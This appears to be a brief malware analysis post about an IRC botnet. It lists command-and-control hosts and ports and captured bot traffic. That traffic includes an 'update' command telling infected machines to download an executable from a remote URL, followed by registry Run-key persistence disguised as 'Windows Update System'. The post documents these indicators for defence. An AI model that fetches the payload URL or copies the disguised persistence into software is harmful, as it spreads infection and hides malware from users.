irc.accesox.net (botnet hosted in France Paris Ovh Sas)

Remote Host Port Number
222.122.46.122 80
91.121.96.162 6667
91.121.96.162 7000

NICK n{USA|XP}671615
NICK {USA|XP}077961
USER 0779 “” “TsGh” :0779
USER 7334 “” “TsGh” :7334
JOIN ##bote##
PRIVMSG ##bote## :[Update]: Updating to: http://www.lespel.co.kr/images/USB_Vlad.exe
JOIN #Weed
PRIVMSG #Weed :
New PC Infected.
MODE pLagUe{USA}32852 -ix
MODE #Weed -ix
NICK pLagUe{USA}32852
USER SkuZ * ok
TeaM UniX b0at 0.4

Registry Modifications

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ Windows Update System = “%AppData%hidserv.exe”
+ raidhost = “raidhost.exe”

so that hidserv.exe runs every time Windows starts
so that raidhost.exe runs every time Windows starts
o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
+ Windows Update System = “%AppData%hidserv.exe”

so that hidserv.exe runs every time Windows starts

Memory Modifications

* There were new processes created in the system:

Process Name Process Filename Main Module Size
raidhost.exe %Windir%raidhost.exe 331,776 bytes
ganja7.exe %System%ganja7.exe 331,776 bytes
ganja8.exe %System%ganja8.exe 331,776 bytes

infos about hosting:
http://whois.domaintools.com/91.121.96.162

Categories: Uncategorized